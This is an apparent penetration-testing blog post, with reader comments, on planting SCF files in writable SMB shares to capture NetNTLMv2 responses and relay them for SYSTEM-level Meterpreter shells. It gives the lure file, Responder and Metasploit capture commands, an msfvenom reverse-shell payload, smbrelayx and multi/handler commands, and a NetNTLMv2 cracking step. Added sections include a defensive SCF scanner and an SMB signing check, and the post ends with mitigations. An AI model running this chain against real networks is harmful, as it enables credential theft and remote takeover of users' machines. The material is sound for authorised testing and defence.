SMB Share – SCF File Attacks

SMB is a protocol widely used across organisations for file sharing. It is not uncommon during internal penetration tests to discover a file share that contains sensitive information such as plain-text passwords and database connection strings. However, even if a share contains no data that could be used to connect to other systems, if it is configured with write permissions for unauthenticated users (or for every authenticated user) it can be used to obtain the NTLM challenge-responses of the domain users who browse it and, combined with SMB relay, Meterpreter shells.

Gathering Hashes

It is nothing new that SCF (Shell Command Files) can be used to perform a limited set of operations such as showing the Windows desktop or opening Windows Explorer. However, the IconFile entry of an SCF file can point to a UNC path, and Explorer will try to retrieve that icon over SMB as soon as it renders the folder, which allows a penetration tester to build an attack. The content below can be placed inside a text file which then needs to be planted on a network share.

[Shell]
Command=2
IconFile=\\X.X.X.X\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

SCF File – Contents

Saving pentestlab.txt with the .scf extension makes Explorer process it as soon as a user browses the folder that contains it: the icon lookup, and with it the outbound SMB connection to X.X.X.X, happens while the listing is rendered, without the user opening the file. Adding the @ symbol in front of the filename sorts pentestlab.scf to the top of the share listing, so it is rendered first even in a large directory.

SCF File
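A defender-side view of the same file format, added here as an example that is not part of the original post: a small parser for the INI-style SCF layout shown above and a check that flags the two tell-tale signs of a planted lure, an IconFile that is a UNC path to a host outside an allow-list and a filename that starts with @. The sample files, the attacker address 10.0.0.5 and the trusted host names are constructed for the example.

```python
import re
from typing import Dict, List

# Constructed samples (not from the original post): the first mirrors the SCF
# shown above with an assumed attacker address, the second is a benign
# "show desktop" SCF whose icon lives on the local disk.
SAMPLE_FILES = {
    "@pentestlab.scf": (
        "[Shell]\r\n"
        "Command=2\r\n"
        "IconFile=\\\\10.0.0.5\\share\\pentestlab.ico\r\n"
        "[Taskbar]\r\n"
        "Command=ToggleDesktop\r\n"
    ),
    "Show Desktop.scf": (
        "[Shell]\r\n"
        "Command=2\r\n"
        "IconFile=%SystemRoot%\\system32\\SHELL32.dll,3\r\n"
        "[Taskbar]\r\n"
        "Command=ToggleDesktop\r\n"
    ),
}

# Hosts whose UNC icon paths are expected in this environment (assumption).
TRUSTED_HOSTS = {"fileserver01", "10.0.0.2"}

# \\host\... : capture the server component of a UNC path.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


def parse_scf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the INI-style SCF format into {section: {key: value}}; names are lower-cased."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def assess_scf(filename: str, text: str, trusted_hosts=TRUSTED_HOSTS) -> List[str]:
    """Return the reasons an SCF found on a share looks like an SMB hash-capture lure."""
    findings: List[str] = []
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    match = UNC_RE.match(icon)
    if match:
        host = match.group(1).lower()
        if host not in {h.lower() for h in trusted_hosts}:
            findings.append(f"IconFile is a UNC path to untrusted host {host}: {icon}")
    if filename.startswith("@"):
        findings.append("filename starts with '@' so it sorts to the top of the listing")
    return findings


def scan(files=SAMPLE_FILES) -> Dict[str, List[str]]:
    """Assess every file of a (constructed) share listing."""
    return {name: assess_scf(name, body) for name, body in files.items()}


if __name__ == "__main__":
    for name, findings in scan().items():
        print(name, "->", findings or ["clean"])
```

In practice the listing would come from walking the writable shares (for example with a scheduled job on the file server); any SCF whose icon resolves to an address that is not a known file server is worth quarantining, because the icon fetch alone is enough to leak a challenge-response.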

Responder needs to be executed with the following parameters to capture the hashes of the users who browse the share (-I selects the listening interface; --lm asks legacy clients for an LM downgrade, modern hosts will still answer with NTLMv2).

responder -wrf --lm -v -I eth0

Responder – Parameters for SCF

When the user browses the share, a connection is established automatically from their system to the UNC path contained in the SCF file, and Windows tries to authenticate to that share with the user's credentials. During the NTLM exchange the server (here Responder) sends a random 8-byte challenge, and the client answers with a response derived from the NT hash of the user's password, the challenge and client-supplied data (an HMAC-MD5 for NTLMv2). Responder records this NetNTLMv2 challenge-response. Note what is obtained: not the NT hash itself, so it cannot be used for pass-the-hash, but it can be cracked offline or, while the exchange is in progress, relayed to another host.

Responder – NTLMv2 via SCF
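To make the exchange above concrete, here is an added example (not code from the original post, nor from Responder) that computes the NetNTLMv2 response exactly as the client does, prints it in the user::domain:challenge:NTProofStr:blob layout that Responder and hashcat (-m 5600) use, and then shows the single step an offline cracker repeats per candidate password. The user name, domain, password, server challenge, client challenge and timestamp are constructed values standing in for what the victim and the rogue server would exchange. MD4 is implemented inline because hashlib frequently lacks it on OpenSSL 3 builds.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), needed for the NT hash."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), range(16), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + f(b, c, d) + x[idx] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c
        h = [(v + w) & MASK32 for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)): pass-the-hash material, and NOT what Responder captures."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)), MS-NLMP 3.3.2."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob); the wire response is NTProofStr || blob."""
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, hashlib.md5).digest()


# Constructed values (assumptions for the example, not captured data).
USER, DOMAIN, PASSWORD = "jdoe", "PENTESTLAB", "Summer2017!"
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")  # the 8-byte challenge the rogue server sends
CLIENT_CHALLENGE = bytes.fromhex("a1b2c3d4e5f60708")  # 8 random bytes chosen by the client
TIMESTAMP = 131496330000000000                        # FILETIME, fixed so the output is deterministic


def build_blob(client_challenge=CLIENT_CHALLENGE, timestamp=TIMESTAMP, nb_domain=DOMAIN) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE ("temp" in MS-NLMP 2.2.2.7): version, reserved, time, nonce, AV pairs."""
    av_pairs = struct.pack("<HH", 2, len(nb_domain) * 2) + nb_domain.encode("utf-16-le")  # MsvAvNbDomainName
    av_pairs += struct.pack("<HH", 0, 0)                                                    # MsvAvEOL
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + av_pairs + b"\x00" * 4)


def capture_line(password=PASSWORD, user=USER, domain=DOMAIN,
                 server_challenge=SERVER_CHALLENGE, blob=None) -> str:
    """The line Responder logs / hashcat -m 5600 reads: user::domain:serverchallenge:NTProofStr:blob."""
    blob = build_blob() if blob is None else blob
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def check_candidate(line: str, candidate: str) -> bool:
    """One offline-cracking step: recompute NTProofStr for a guess and compare it with the capture."""
    user, _, domain, chal, proof, blob = line.split(":")
    guess = nt_proof(candidate, user, domain, bytes.fromhex(chal), bytes.fromhex(blob))
    return hmac.compare_digest(guess, bytes.fromhex(proof))


if __name__ == "__main__":
    line = capture_line()
    print(line)
    for guess in ("Password1", "Summer2017!"):
        print(f"{guess!r}: {'cracked' if check_candidate(line, guess) else 'no match'}")
```

Two things the code makes visible: the captured line never contains the NT hash, only an HMAC keyed by it, and because the HMAC is bound to the user name, domain and this particular challenge, every candidate password has to be hashed against this specific capture. That is why a sufficient password policy translates directly into cracking time.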

As an alternative to Responder, the Metasploit Framework has a module that captures challenge-response password hashes from SMB clients:

auxiliary/server/capture/smb

Metasploit – Capture SMB Module

As before, when the user browses the share, their challenge-response will be captured by Metasploit.

Metasploit – NTLMv2 Captured

If the password policy inside the company is sufficient, cracking the captured response may take the attacker days or weeks: because a NetNTLMv2 response is bound to the user name, domain and challenge, it cannot be attacked with precomputed tables and every candidate password must be tried against this specific capture.

Meterpreter Shells

The main advantage of the technique above is that it doesn't require any user interaction beyond opening the share: the SCF automatically forces the user's machine to connect to a share that doesn't exist and to negotiate NTLM authentication. Therefore it is also possible to combine this technique with SMB relay, where the authentication is forwarded to another host on which the user has administrative rights, in order to serve a payload and retrieve a Meterpreter shell from every such user who accesses the share. The relay only succeeds against targets that do not require SMB signing.

MSFVenom can be used to generate the payload that will be executed on the target:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.171 LPORT=5555 -f exe > pentestlab.exe

MSFVenom – Payload Generation for SMB Relay

Core Security has released a set of Python scripts called Impacket that can perform various attacks against Windows protocols such as SMB. Using the smbrelayx.py script it is possible to set up an SMB server that relays each incoming authentication to the target host (-h) and, if the relayed user has administrative rights there, uploads and executes the payload (-e). This is performed automatically since the SCF file forces every user who browses the share to connect to the non-existent share with their credentials.

./smbrelayx.py -h Target-IP -e ./pentestlab.exe

Impacket – SMB Relay Server

The Metasploit Framework needs to be used as well in order to receive the connection back upon execution of pentestlab.exe on the target.

exploit/multi/handler

The module needs to be configured with the same parameters as the generated payload.

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.171
set LPORT 5555
exploit

Metasploit – Multi Handler Module for SMB Relay

When the user browses the share, the SMB server receives the connection and relays the user's authentication to the target system; if the relayed user is an administrator there, it writes the payload to an administrative share and executes it as a service.

Impacket – SMB Relay Attack

A Meterpreter session will be received. However, in order to avoid losing the connection it is necessary to migrate to a more stable process, because smbrelayx stops the service it created and removes the dropped executable right after execution.

Meterpreter – List Running Processes

The migrate command followed by the process ID needs to be used.

Meterpreter – Process Migration

In this example, process 1600 corresponds to an svchost.exe process running with SYSTEM privileges.

Meterpreter – List of Processes for Migration

Running getuid from the Meterpreter console shows the current user, which is now SYSTEM.

Meterpreter – Retrieve Current UID

The same attack can also be implemented with the Metasploit Framework.

exploit/windows/smb/smb_relay
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.171
exploit

Metasploit – SMB Relay Module

An SMB server will be established which authenticates to the target with the relayed username and password hash, delivers the payload to a writeable share, executes it as a service with the rights of the relayed user, performs the clean-up and returns a Meterpreter session.

Metasploit – SMB Relay Attack

Interaction with the existing sessions can be performed with the sessions command.

Metasploit – SMB Relay Sessions

Conclusion

This technique exploits something that is really common in all networks, file shares, in order to retrieve password hashes and get Meterpreter shells. The only requirement is that a user browses the share that contains the malicious SCF file. However, these attacks can be prevented by the following:

  • Use Kerberos authentication and enforce SMB signing (relaying fails against a host that requires signing)
  • Disallow write permissions on file shares for unauthenticated users, and review shares that are writable by every authenticated user
  • Ensure that NTLMv2 is used instead of LanMan/NTLMv1 (LmCompatibilityLevel set to send NTLMv2 responses only), so a rogue server cannot request a weaker response

asolino commented on 13 Sep 2017

Hey @chacalito

smbrelayx.py indeed works against Windows 2012 (I actually tested it against Windows 2016). The issue here has to do with the server’s configuration.
If you’re targeting a domain controller (meaning, you’re trying to relay credentials against the DC) no SMB Relay attack will work since DCs are enforcing SMB signing for any client connecting to them.

This could also happen when targeting other servers in the domain, depending on the GPOs applied in the domain joined workstations.

The GPOs that need to be changed depend on who's enforcing signing, but in general are these two:

Microsoft network client: Digitally sign communications (always)
Microsoft network client: Digitally sign communications (if server agrees)
Microsoft network server: Digitally sign communications (always)
Microsoft network server: Digitally sign communications (if client agrees)

If you disabled both, and you’re still receiving the Signature is REQUIRED message it is because you didn’t disable them in the right GPO, or you’re still targeting the DC. Getting the Wireshark capture will help me understand who’s enforcing it (client or server). You can check that in the first SMB messages exchanged (NEGOTIATE packets).

Hope this helps,
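The check asolino describes, reading the signing requirement out of the first SMB2 NEGOTIATE exchange, is what decides whether the relay in the Meterpreter section above can work at all. The following added example (my code, not asolino's and not Impacket's) builds a constructed SMB2 NEGOTIATE Response with a chosen SecurityMode (MS-SMB2 2.2.4) and parses it back the way a relay tool would before deciding whether to relay. The ServerGuid, sizes and times are placeholder values, and the 4-byte NetBIOS session header that precedes the message on TCP 445 is assumed to have been stripped already.

```python
import struct
from typing import Tuple

SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SMB2_HEADER_LEN = 64
SMB2_NEGOTIATE = 0x0000


def build_negotiate_response(security_mode: int, dialect: int = 0x0302) -> bytes:
    """Constructed SMB2 NEGOTIATE Response; every field other than SecurityMode is a placeholder."""
    header = struct.pack(
        "<4sHHIHHIIQIIQ16s",
        b"\xfeSMB",                 # ProtocolId
        64,                         # StructureSize
        0,                          # CreditCharge
        0,                          # Status
        SMB2_NEGOTIATE,             # Command
        1,                          # CreditResponse
        SMB2_FLAGS_SERVER_TO_REDIR, # Flags: this is a response
        0,                          # NextCommand
        0,                          # MessageId
        0,                          # Reserved
        0,                          # TreeId
        0,                          # SessionId
        b"\x00" * 16,               # Signature
    )
    body = struct.pack(
        "<HHHH16sIIIIQQHHI",
        65,                         # StructureSize (64 + 1 byte of Buffer)
        security_mode,              # SecurityMode
        dialect,                    # DialectRevision
        0,                          # NegotiateContextCount / Reserved
        b"\x00" * 16,               # ServerGuid (placeholder)
        0,                          # Capabilities
        0x800000, 0x800000, 0x800000,  # MaxTransactSize, MaxReadSize, MaxWriteSize
        0, 0,                       # SystemTime, ServerStartTime (placeholders)
        SMB2_HEADER_LEN + 64, 0,    # SecurityBufferOffset, SecurityBufferLength (no token)
        0,                          # NegotiateContextOffset / Reserved2
    )
    return header + body + b"\x00"  # one-byte Buffer


def parse_security_mode(packet: bytes) -> int:
    """Return the SecurityMode field of an SMB2 NEGOTIATE Response, validating the header first."""
    if packet[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message")
    (command,) = struct.unpack_from("<H", packet, 12)
    (flags,) = struct.unpack_from("<I", packet, 16)
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    structure_size, security_mode = struct.unpack_from("<HH", packet, SMB2_HEADER_LEN)
    if structure_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return security_mode


def relay_viable(packet: bytes) -> Tuple[bool, str]:
    """Decide from the server's SecurityMode whether a relayed (unsigned) session could be accepted."""
    mode = parse_security_mode(packet)
    if mode & SMB2_NEGOTIATE_SIGNING_REQUIRED:
        return False, "server requires signing: a relayed session is rejected (the 'Signature is REQUIRED' case)"
    if mode & SMB2_NEGOTIATE_SIGNING_ENABLED:
        return True, "signing supported but not required: relay possible unless client-side GPO forces signing"
    return True, "signing not offered"


if __name__ == "__main__":
    # Constructed responses: a domain controller (signing required) and a default workstation.
    for name, mode in (("DC", SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED),
                       ("workstation", SMB2_NEGOTIATE_SIGNING_ENABLED)):
        ok, why = relay_viable(build_negotiate_response(mode))
        print(f"{name}: relay {'possible' if ok else 'blocked'} - {why}")
```

The same bits are what Wireshark shows under "Security mode" in the NEGOTIATE packets; a domain controller will always carry the required flag, which is why relaying to the DC cannot succeed regardless of the GPOs on the member servers.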

Hi @asolino
Thank you so much for your help. My delay in replying was because even after disabling these GPOs I kept receiving the same log message (Signature is REQUIRED), but after disabling the 2 keys below via regedit [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameter{EnableSecuritySignature}] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameter{RequireSecuritySignature}] it worked.

However I got a new problem: a few seconds after I compromised the server and the tool executed the payload, the session on the Metasploit handler dies. smbrelayx itself removes the .exe, as the log below shows:

[-] 192.168.0.108 is being attacker at the moment, skipping.. 
[*] Service Installed.. CONNECT!
[*] Opening SVCManager on 192.168.0.108.....
[*] Stoping service SItD.....
[*] Removing service SItD.....
[*] Removing file LsetwAWv.exe.....

It’s so fast that I don’t have enough time to migrate the session. I looked at the possible parameters with --help but I didn’t see any parameter to keep the session alive for longer.

Is there a way to make it take longer?
